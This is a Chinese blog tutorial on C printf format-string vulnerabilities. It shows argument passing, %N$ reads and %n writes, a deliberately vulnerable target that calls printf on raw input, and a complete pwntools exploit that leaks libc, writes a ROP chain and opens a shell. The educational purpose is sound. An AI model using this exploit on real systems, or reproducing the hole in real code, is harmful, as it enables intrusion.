C格式化漏洞

最新推荐文章于 2024-02-19 15:14:27 发布
最新推荐文章于 2024-02-19 15:14:27 发布
阅读量621 收藏 1
点赞数
分类专栏: pwn C/C++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19683651/article/details/79473500
版权
pwn 同时被 2 个专栏收录
7 篇文章 0 订阅
订阅专栏
C/C++
3 篇文章 0 订阅
订阅专栏

测试平台:ubuntu14.04 x64

前言

格式化漏洞是由在编程时使用printf函数在将数据格式化输出时产生的漏洞,其中*printf()函数包括printf, fprintf, sprintf, snprintf, vprintf, vfprintf,vsprintf, vsnprintf等函数,它们可以将数据格式化后输出。以最简单的printf()为例:
int printf(const char *format, arg1,arg2,…);

printf参数如何传递

先来看一个简单例子:

#include <stdio.h>
int main(int argc,char* argv[])
{
    char str1[]="hello ";
    char str2[]="world ";
    char str3[]="I ";
    char str4[]="am ";
    char str5[]="Tom ";
    char str6[]="i ";
    char str7[]="very ";
    char str8[]="happy ";
    char str9[]="to ";
    char str10[]="see ";
    char str11[]="you !";
    printf("%s %s %s %s %s\n", str1,str2,str3,str4,str5);
    printf("%s %s %s %s %s %s %s %s %s %s %s\n", str1,str2,str3,str4,str5,str6,str7,str8,str9,str10,str11);
    return 0;
}

这里的printf低于6个参数,则直接传给寄存器,按照参数从左到右依次为edi,rsi,rdx,rcx,r8,r9
这里写图片描述
大于5个参数时,则会压入栈:
这里写图片描述

这里写图片描述
所以采取<<0day安全>>中介绍的格式化漏洞利用,会略有区别。

关于$和%n

$ 号是用来指定参数的。读取栈上某地址的话大概格式是: 

 %%参数顺序$类型n,譬如:%7$lx,就是以lx格式读第7个参数的值。

如果做写入的话一般格式是: 

%%数值c%参数顺序$类型,譬如说:%%40c%5$hhn,就是向第5个参数写入40这个数值。

$n演示

#include <stdio.h>
int main(int argc,char* argv[])
{
    char str1[]="hello ";
    char str2[]="world ";
    char str3[]="I ";
    char str4[]="am ";
    char str5[]="Tom ";
    printf("%2$s %s %s %s %s %s\n",str1,str2,str3,str4,str5 );
    return 0;
}

输出结果就成了:

world  hello  world  I  am  Tom

%n$p,合理控制n就能获取栈中数据

%n演示

int main(int argc,char* argv[])
{
    char str1[]="111111";
    char str2[]="222222";
    printf("%%48c%2$hhn \n",str1,str2 );
    printf("%c %c %c %c\n",str2[0],str2[1],str2[2],str2[3]);
    return 0;
}

结果

%48c 
4 32 32 32

格式化漏洞利用

靶程序

#include <stdio.h>
#include <string.h>

int handle(){
    char buf[32];
    memset(buf,0,32);
    read(0,buf,32);
    printf(buf);
    printf("\n");
    fflush(stdout);
    if(strcmp(buf,"exit")==0){
        return 1;
    }
    return 0;
}

int main(int argc,char* argv[])
{
    while(1){
        if(handle()){
            break;
        }
    }
    return 0;
}

exploit

from pwn import *
import sys, os

DEBUG = 1
if DEBUG:
    target='./crakeMe'
    context.log_level='error'
    pro = process(target)
    #gdb.attach(pro)
else:
    p = remote('xxxxxx', 8080)

def get_ptr_value(addr):
    payload='%7$s---\x00'+p64(addr)
    pro.sendline(payload)
    data=pro.recvuntil('---\n', drop=False)[:-4]
    if data == "":
        data = "\x00"
    return data

def leak_data(addr):
    return get_ptr_value(addr)

def get_system_addr():
    d = DynELF(leak_data, elf=ELF(target))
    system_addr = d.lookup('system', 'libc')
    return system_addr


def get_libc_addr():
    d = DynELF(leak_data, elf=ELF(target))
    system_addr = d.lookup(None, 'libc')
    return system_addr

def get_fun_addr(addr):
    value =get_ptr_value(addr)
    fun_addr=u64(value.ljust(8,'\x00'))
    return fun_addr

def get_ebp_addr():
    payload='%12$lx'
    pro.send(payload)
    return int(pro.recvuntil('\n', drop=False)[:-1],16)

def modify_addr_val(addr,val):
    if val == 0:
        val = 0x100
    payload = '%%%dc%%8$hhn--\x00'%val
    payload+=(16-len(payload))*'\x00'
    payload+= p64(addr)
    pro.send(payload)
    pro.recv()

def modify_addr_data(addr, data):
    for i in range(len(data)):
        modify_addr_val(addr + i, ord(data[i]))


def main():
    ebp_addr=get_ebp_addr()

    offset=-0xa8d90
    read_got=0x601038
    read_addr = get_fun_addr(read_got)
    system_addr=get_system_addr()
    print 'offset',hex(system_addr -read_addr)
    #0x00FDFF9   pop rax
    #0x00FDFFA   pop rdi 
    #0x00FDFFA   call rax
    call_eax_addr=0x00FDFF9+get_libc_addr()

    start_addr=ebp_addr+8
    binsh_addr=ebp_addr+8*4
    payload =p64(call_eax_addr)
    payload+=p64(system_addr)
    payload+=p64(binsh_addr)
    payload+='/bin/sh;'
    #context.log_level='debug'
    modify_addr_data(start_addr,payload)

    payload='exit'
    pro.send(payload)
    pro.interactive()

if __name__ == '__main__':
    main()

参考资料$:https://bbs.pediy.com/thread-224943.htm

浅浅徘徊
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言系统化精讲(五):C语言格式化输入和运算符与表达式
Amo Xiang的博客
10-26 2424
本文详细介绍了C语言中常用的输入函数以及运算符
c语言格式化符,C语言 格式化字符
weixin_42518874的博客
05-24 3863
格式字符控制:说明:sprintf(格式化后的字符,"%(长度)格式符",格式化前的字符);1、 d格式符。用来输出十进制数。有以下几种用法:(1)、%d按整数的实际长度输出。(2)、%md,m为指定的输出字段的宽度。如果数据位数小于m,则左端补以空格,若大于m,则按实际位数输出。(3)、%ld,输出长整型数据。例:long a=135790;printf(“%ld”,a);如果用%d输出就会发生...
C的格式化
编程菜鸟---正在努力进阶
11-25 904
 gcc的格式化规格:%d ,%i 十进制有符号整数 %u 十进制无符号整数 %o 无符号八进制整数 %x, %X 无符号以十六进制表示的整数,其中:%x是以小写形式输出的 %X是以大写形式输出的 %f, %F double精度浮点数 %s 输出字符串 %c 输出单个字符 %p 输出指针的值 %e, %E  指数形式的浮点数 ,其中:%e是以小写形式输出
[CS-161]C语言内存漏洞以及如何利用
Cplus_ruler的博客
10-14 1198
[CS-161]C语言内存漏洞以及利用方式
C语言格式化输入和输出; Format格式化
xiaoyaolangwj的博客
02-16 3931
字符串拼接与分割(含中文);Format格式化;字符格式化;字符串格式化文件读写;四则运算文件版
格式化漏洞利用技术
03-10
格式化漏洞源于C/C++中的`printf`、`scanf`等格式化输出和输入函数。当程序接受用户输入并将其传递给这些函数时,如果输入的数据能够改变函数的行为,就可能导致安全问题。例如,通过精心构造的输入,攻击者可以使...
格式化字符串漏洞1
08-04
格式化字符串漏洞】是一种常见的安全问题,常见于C语言编程环境,特别是在使用`printf`和`scanf`家族函数时。这种漏洞发生的原因是程序在处理格式化字符串时,允许外部输入来控制输出或者错误地处理了参数类型,...
格式化字符串漏洞的介绍
01-20
格式化字符串漏洞是一种安全漏洞,主要发生在C语言编程中,由于程序员不正确地使用格式化字符串函数(如printf、sprintf等)而导致。这类漏洞最早在2000年被发现,尤其是在开源软件wu-ftpd中出现的远程格式化字符串...
格式化字符串漏洞检测1
08-08
格式化字符串漏洞是一种常见的安全漏洞,主要出现在C语言或类似C语言的编程环境中,其中程序员使用了不安全的格式化字符串函数,如`printf`、`scanf`、`snprintf`等。这些函数允许攻击者通过输入特定的格式化字符串...
C语言格式化输出
C语言技术网-码农有道
08-04 1万+
格式化输出 格式化输出的函数有printf、sprintf和snprintf等,功能略有不同,使用方法大同小异,本章节我们以printf为例。 对于 printf 函数,相信大家并不陌生。之所以称它为格式化输出函数,该函数的声名如下: int printf(const char *format, ...); 大家看...
c语言格式化输出
Louis_12345的博客
02-24 1万+
C语言printf指定宽度的格式化输出 printf() 是一个标准库函数,使用时需要 include 头文件 stdio.h。 #include<stdio.h> printf() 函数的调用形式为: printf(“格式控制字符串”, 输出列表); 其中,格式控制字符串用于指定输出格式,有格式字符串和非格式字符串两种形式。 格式字符串有 %,%后面跟着各种格式字符,用以说明输出数据的类型、形式、长度、小数位等。 下面是一些常用的指定宽度的格式化输出例子。 格式化占位符(format): %[
C语言中字符串的格式化
Robin Hu的专栏
12-17 1万+
本文整理转载自:http://wenku.baidu.com/view/065d62fff705cc1755270989.html C语言中格式字符串的一般形式为: %[标志][输出最小宽度][.精度][长度]类型, 其中方括号[]中的项为可选项。 一、类型 我们用一定的字符用以表示输出数据的类型,其格式符和意义下表所示: 字符
C# 字符串格式化
最新发布
zunguitiancheng的专栏
02-19 1715
也就是说,若要单独使用自定义格式说明符“d”、“f”、“F”、“h”、“m”、“s”、“t”、“y”、“z”、“H”或“M”,请指定“%d”、“%f”、“%F”、“%h”、“%m”、“%s”、“%t”、“%y”、“%z”、“%H”或“%M”。如果“E”、“E+”、“E-”、“e”、“e+”或“e-”中的任何一个字符串出现在格式字符串中,而且后面紧跟至少一个“0”字符,则数字用科学记数法来格式化,在数字和指数之间插入“E”或“e”。“E”、“E-”、“e”或“e-”格式指示符号字符仅置于负指数前面。
【C++】Clang-Format:代码自动格式化(看这一篇就够了)
热门推荐
Friday
03-07 2万+
ClangFormat格式化控制工具介绍
格式输出函数scanf()漏洞
m0_46239295的博客
07-24 597
scanf()读数据先把数据放到缓冲区,缓冲区会读输入的\n 空格等,造成下一个字符误读。
c语言printf相关函数 格式化字符串攻击 简介
whatday的专栏
09-18 730
目录 一、类printf函数簇实现原理 二、格式化字符串攻击原理 三、一个实际的例子 一、类printf函数簇实现原理 类printf函数的最大的特点就是,在函数定义的时候无法知道函数实参的数目和类型。 对于这种情况,可以使用省略号指定参数表。 带有省略号的函数定义中,参数表分为两部分,前半部分是确定个数、确定类型的参数,第二部分就是省略号,代表数目和类型都不确定的参数表,省略号参数表中参数的个数和参数的类型是事先的约定计算出来的,每个实参的地址(指针)是根据确定参数表中最后一个实参的地址算出
格式化字符串漏洞利用实战之 njctf-decoder
weixin_30527551的博客
08-03 194
前言 格式化字符串漏洞也是一种比较常见的漏洞利用技术。ctf 中也经常出现。 本文以 njctf 线下赛的一道题为例进行实战。 题目链接:https://gitee.com/hac425/blog_data/blob/master/decoder 正文 程序的流程如下 部分函数已经进行了标注,看程序打印出来的提示信息就知道这个是一个 base64 解码的程序,然后可以通过 猜测 + 验证 的方式...
php中sscanf,[转载]PHP sscanf函数本地堆缓冲区溢出漏洞
weixin_36257615的博客
03-11 217
PHP sscanf函数本地堆缓冲区溢出漏洞受影响系统:PHP PHP <= 5.1.4PHP PHP <= 4.4.3不受影响系统:PHP PHP 5.1.5PHP PHP 4.4.4描述:——————————————————————————–BUGTRAQ ID: 19415CVE(CAN) ID: CVE-2006-4020PHP是广泛使用的通用目的脚本语言,特别适合于Web开发...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值